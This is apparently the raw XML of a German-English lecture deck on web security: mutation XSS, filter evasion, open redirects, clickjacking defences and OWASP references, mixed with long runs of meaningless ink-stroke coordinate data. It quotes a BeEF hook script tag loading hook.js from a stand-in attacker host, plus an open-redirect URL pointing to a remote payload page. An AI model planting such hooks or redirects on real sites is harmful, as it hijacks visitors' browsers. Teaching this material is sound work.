1,0 5-1,3 33 230,-2-36-255,-1 1 0,0-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 1,0-1-1,-3 10 0,-7 25 98,0 15 324,9-34-153,2-21-280,0 1-1,1-1 0,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,0-1 1,-1 2-1,-9 12 87,11-15-89,1 1 0,-1 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 1,0-1-1,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 1,-1 0-1,1 0 0,0 0 0,0-1 0,-1 1 1,1 0-1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 1,-1-1-1,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,1-4 52,0-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,0-1 0,3-3 0,9-20 50,-5 3-109,1 1 1,1 0-1,1 0 0,1 1 0,0 1 0,2 1 1,1 0-1,1 0 0,0 2 0,2 0 1,0 1-1,1 1 0,0 1 0,39-23 1,-56 37 2,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,0 1 0,-1-1 0,8 0 0,-10 1-9,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1-1,0 1 1,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0-1,0 1 1,-1 3 0,0 0-1,0-1 0,0 1 1,-1 0-1,0-1 1,0 0-1,0 1 0,-1-1 1,1 0-1,-1 0 1,0 0-1,0-1 0,-1 1 1,1-1-1,-1 0 0,1 0 1,-6 4-1,-11 8 0,-40 22 1,42-27-125,0-1 1,0-1 0,-39 13 0,6-15-2519,42-8 1950,7-8-4801,12-8-2656,-9 12 5109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48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 2100,'-20'-5'10020,"20"5"-9967,-1 0 0,1 0 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 1 1,1-1-1,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,18 6-823,-17-6 125,5 0 715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8:5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4839 8 440,'-11'-7'6973,"11"7"-6827,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 0,1 1 1,-1-1-1,0 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,1-1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 1 0,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,4-4 3370,-4 5-3305,0 1-1,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 1,-1 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 1,0 0-1,-2 1 0,-13 15 257,15-15-424,-1 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,0-1 0,0 1-1,0 0 1,0-1 0,0 1 0,-4 1-1,1-1 53,0 1 0,0-1-1,0 1 1,0 1 0,0-1-1,0 1 1,-6 6-1,-29 20 322,-89 43 590,45-19-347,-166 74 616,131-80-951,1 1 296,53-27-260,20-8-90,-67 17 609,43-13-509,-99 18 449,140-31-670,-33-1 338,48-4-320,0 1 0,0 0-1,-25 5 1,11-1-62,-1-1-1,1-1 1,-1-2-1,0-1 1,-28-3-1,-20 0-100,32 4 88,18 0 54,-1-1 1,-46-7-1,51 1-145,14 4 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0 1 0,-12 0 0,-118-6 0,93 4 0,33 1 0,0 0 0,0 1 0,0 0 0,-14 3 0,16-2 0,0 0 0,0-1 0,0 0 0,-19-3 0,-22-1 0,-57-8 0,-41-6 0,7 24 0,131-7 0,0-3 0,-23-6 0,-1 1 0,0 2 0,-1 2 0,-50-2 0,77 8 0,-19-7 0,1-2 0,16 4 0,-5 0 0,0 1 0,0 1 0,-27-1 0,15 1 0,9-2 0,-1 0 0,0 2 0,0 0 0,0 2 0,0 0 0,0 1 0,0 1 0,-21 4 0,-61 4 0,-81-4 0,119 0 0,-76 0 0,129-6 0,0-1 0,0-1 0,0 0 0,-21-7 0,21 6 0,-96-20 0,42 10 0,-21-8 0,66 8 0,17 10 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,-6-1 0,4 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-6-5 0,-36-22 0,-16-2 0,61 27 0,2 4 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,-1-1 0,-9-5 0,3 0 0,1 1 0,0-2 0,1 1 0,0-1 0,-8-11 0,11 12 0,-1 1 0,1-1 0,-1 1 0,0 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,-12-7 0,11 9 0,-3-7 0,6 5 0,0 0 0,-3 3 0,4-5 0,2 4 0,-2 3 0,3 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-2 0 0,-8-9 0,10 9 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-5-2 0,3-15 0,0 12 0,-5 5 0,-49-13-13379,54 11 12615,-1 1-1,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0 0 0,-6 1 1,-5 0-1923,-17-1-1642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13 437 976,'-1'0'145,"1"0"1,-1 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1-1 0,-1 1 1,1-1-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,0-1 1,-1 0-1,1 1 0,0-1 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,1-2-1,-1 0 183,0 1-1,0-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 0,-1 0 1,1-1-1,0 1 1,0 0-1,0-1 1,-1 1-1,3-2 0,-1 2 366,-2-9 1113,1-9 3012,7 10-4336,-7 9-449,-1-1 0,1 0 1,-1 0-1,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,-1-2 0,0 2-3,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,1 1 0,0-2 0,0 1 9,0 0-1,1-1 0,-1 1 0,0 0 1,0-1-1,-1 1 0,1-1 0,0 1 1,-1-1-1,1 1 0,-1-1 1,0-3-1,8-27 199,-7 27-187,1 0 0,-1 0-1,0 0 1,-1-1 0,0 1 0,0 0-1,0 0 1,-2-11 0,1-7 204,11-7 247,-10 29-470,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,0-1-1,1 1 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1-1,2-3 1,-2 2 27,0 0 1,0 0 0,-1 1-1,1-1 1,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1-2 1,0-6 285,1 10-204,2-29 1175,39 35-1115,8 5-70,0-3 0,0-1 0,1-3 0,62-4 0,-63 1-123,163-12 67,-190 9-76,-20 2-37,-1 1 0,1-1-1,0 1 1,-1 0 0,1 0-1,-1 0 1,1-1 0,0 1-1,-1 1 1,1-1 0,-1 0-1,1 0 1,0 1-1,-1-1 1,1 1 0,-1-1-1,3 2 1,-4-1-136,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1-1 1,1 1-1,-1 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 1,-2 0-1,-18 17-5372,-2-6-2620,12-11 3772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32 48,'0'6'15243,"-9"0"-14026,10-6-1195,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0-1 0,1 1-1,-1 0 1,0 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,1-1 0,-1 1-1,0 0 1,0-1 0,0 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,-1 0 262,25-16-189,-17 16-99,13-4-4,-18 4 8,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0-1,1 0 1,1 1 0,10-1 14,-8-1-15,0 1-1,-1 0 1,1 0 0,0 0 0,0 1 0,0 0-1,0 0 1,5 2 0,20 4 11,-30-7-12,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 1-1,-1-1 1,0 0-1,1 1 1,-1-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,2 1 1,5 7-42,-8-9 42,1 0 1,0 1-1,0-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1 7 11,-1 0 0,0 0 0,0 0 0,-1 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,-6 8 0,-10 24 20,11-27-20,8-12-9,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,1 1 0,-1-1-1,1 1 1,0-1-1,-1 0 1,1 1-1,0 1 1,-11 59 42,11-56-39,1 0 0,0 0 1,0 1-1,1-1 1,0 0-1,0 0 0,0-1 1,1 1-1,-1 0 0,1-1 1,1 1-1,-1-1 1,5 5-1,11 12-11,36 33 1,-36-38 68,-2 0 0,22 28 0,-36-42-15,-1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-1-1 1,0 1 0,0 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,-1 5 0,0-5-4,0-1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-5 2 0,-15 3-20,0 0 0,0-1 0,-38 3 0,-10 2-327,67-10 173,0 0 0,-1 0-1,1-1 1,0 1 0,0-1 0,0 0 0,0 0-1,0 0 1,-6-3 0,8 3-297,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0-1,-1-2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1236,'0'0'1844,"0"-7"-568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5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12 784,'2'-12'9712,"-1"12"-9518,1 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,1 0 1,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,-1 1-1,1-1 1,0 0-1,-1 1 1,1 1 0,9 52 699,-4-15-534,-4-30-254,0 0 0,-1 0 0,0 0 1,-1 1-1,-1 16 0,0-18-25,0 0 0,1 0 1,0 1-1,1-1 0,0 0 0,5 17 1,-5-21-50,0 1 1,0-1 0,0 0 0,-1 1-1,0-1 1,-1 11 0,1-12-20,-1 0-1,1 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,2 5 0,-2-8-18,0 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,1 1 1,-1-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 1,-1 0-1,1 1 0,0-1 0,-1 0 0,1 0 1,-2 2-1,2-2-99,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,-1 0 0,-30-12-9488,21 2 6145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6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0 206 504,'1'-4'437,"0"-1"-1,1 1 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,1 0 1,0 0-1,-1 1 1,7-7 0,35-36 1881,-34 36-2074,0 0-1,0 1 1,1 0 0,1 1 0,0 0 0,0 1 0,0 0 0,1 1-1,0 0 1,0 1 0,0 0 0,1 2 0,-1-1 0,1 1 0,21-1-1,-32 5-197,1-1-1,-1 1 0,0-1 1,1 1-1,-1 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0 0 0,0-1 1,-1 1-1,1 0 0,0 1 1,-1-1-1,0 0 0,1 1 1,-1-1-1,0 1 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 1-1,-1-1 0,1 0 1,-1 1-1,0-1 0,0 0 1,0 1-1,0-1 1,-1 0-1,1 1 0,-1-1 1,-1 4-1,-6 11 426,4-8-232,0 0 0,-1 0 0,1-1 0,-2 0 0,0 0 0,-11 14 0,-16 15 400,27-29-504,-1-1-1,0-1 0,0 1 1,-9 6-1,-3 1 132,16-11-189,-1-1 0,0 0 0,0 0 0,0 0 1,0-1-1,-1 1 0,1-1 0,-1 0 0,-5 2 0,-5 0 289,-24 3 477,52-20-1856,-4 8-125,1 0-1,1 1 0,-1 0 0,1 1 1,-1 0-1,1 1 0,0 0 0,11 0 0,-7 0 388,11-2-1,-26 3 764,0 1 1,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0-1,0 1 1,1-1 0,-1 0 0,1 0-1,-1 0 1,0 1 0,1-1 0,-1 0-1,0 0 1,1 1 0,-1-1 0,0 0-1,1 1 1,-1-1 0,0 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 1-1,45 22 5063,-11-6-3190,-24-14-1540,-1 2 0,0-1 1,0 1-1,15 12 0,30 23 386,-39-26-646,-12-11-82,-1-1 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,1-1 0,-1 1 0,7 0 0,18 2 153,-20-2-3773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32 103 1332,'0'0'1432,"-9"5"1468,13-4-2583,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,1 0 0,-1 0 0,0-1 0,8-1 0,41-10 617,-46 11-718,0-1 0,0 1 0,0-2-1,0 1 1,-1-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,-1-1 0,7-7 0,-11 12-169,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,-4-5 471,5 5-490,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 1 1,-1-1-1,0 0 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 0,-1 1 1,1-1-1,0 0 1,0 0-1,0 0 1,-1 1-1,-43 9 314,33-4-228,-1 1 1,1 0-1,1 1 1,-1 0-1,1 1 1,1 0-1,0 0 1,-15 19 0,22-25-94,1 1 1,-1-1 0,1 1 0,1-1 0,-1 1-1,0 0 1,1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1-1 0,2 5-1,-1-2 0,0-1-1,0 0 1,1 0 0,0 0-1,0 0 1,0-1-1,1 1 1,-1-1-1,1 0 1,0 0 0,1-1-1,-1 0 1,0 0-1,1 0 1,0 0-1,8 2 1,0-1-27,0 0 0,0-1-1,0 0 1,1-1 0,-1-1 0,16 0 0,-20-1-534,-1-1 0,1 0 0,0 0 1,0-1-1,16-5 0,-20 4-608,0 0 0,0-1 1,0 1-1,-1-1 0,0 0 0,1-1 0,-1 1 0,6-9 0,0 1-2101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24T09:09:0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6 1092,'0'0'1578,"-19"-6"8693,20 7-10170,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1-1,0 1 1,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 2-1,7 42 589,-2-10-551,-3-28-116,0 0 0,-1 1 0,0-1 0,0 0 0,-1 13 0,4 28 42,18 62 22,-1-8-69,-18-96-15,-1 1 1,0-1-1,0 1 1,-1 0-1,0 0 1,0 0-1,0 7 1,5-7-34,-3-3-65,-10-3 23,-8-26-1689,12 19 1536,-1 1 0,0 0 0,0-1 0,-1 1 1,1 1-1,-1-1 0,-8-5 0,3 2 161,6 4 37,-56-40 206,39 34 176,18 9-172,-1-1 0,1 1-1,0-1 1,0 0 0,0 0 0,0 0 0,0-1 0,-4-2-1,-4-5 1190,6 3-516,32 6-668,39 4-361,-4 0-3149,1-8-6106,-51 4 6281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lem.de/news/mxss-cross-site-scripting-in-der-google-suche-1904-140406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Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Breaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Zum Teil CSRF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38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3149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557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242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Properties wie .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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> verändern (mutieren) das übergebene HTML um Fehler zu korrigieren (z.B. End-Tags einfügen)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Name kommt daher, weil erst durch die Veränderung (Mutation) der Eingabe durch den Browser, ein ausführbares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de-DE" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> entsteht.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Jeder Browser macht das ein bisschen anders und auch die XSS-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Filterlibraries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machen es unterschiedlich (oder gar nicht)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effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> =&gt; wenn es hier eine Differenz gibt, dann kann es sein, dass XSS-Filter es nicht bemerkt, Browser aber ausführt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068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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> filter library used a template element to simulate the input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But according to HTML standard, within the template element JS is disabled, and when JS is disabled, the no-script tag is interpreted, so the browser fixes it and it seems benign.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But for real rendering JS is enabled and the HTML spec says, that no-script tags are just ignored, and the browser uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p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https://www.golem.de/news/mxss-cross-site-scripting-in-der-google-suche-1904-140406.html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697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them were around 2017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073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56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956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2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550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Vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: darkside-beef.me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hook-url: &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://darkside-beef.me:3000/hook.js"&gt;&lt;/script&gt;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8787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5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https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet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005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https://w3c.github.io/reporting/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT"/>
              <a:t>2 HTTP-Header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685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except some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reeeeaaaly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> old browsers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9126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895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1093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003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8556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8042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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>redirect.php?uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Luke&amp;color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>=http://darkside.me/payload.html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4923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7487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006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340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93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7262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0115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352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7908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6584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1592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allow-from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>funktioniert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allen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> browser!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04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Clientseitiges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Frame Busting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empfehlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, da es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browserspezifisch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und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häufig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>umgangen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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>besten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kombination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X-Frame-Options und CSP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2547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0450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60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4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5646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https://portswigger.net/web-security/cross-site-scripting/dom-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>https://owasp.org/www-community/Types_of_Cross-Site_Scripting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53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25.02.2021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611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625.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink633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641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650.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink673.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink659.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink670.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink681.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink601.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink606.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink620.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink628.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink636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image" Target="../media/image911.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink667.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink654.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId253" 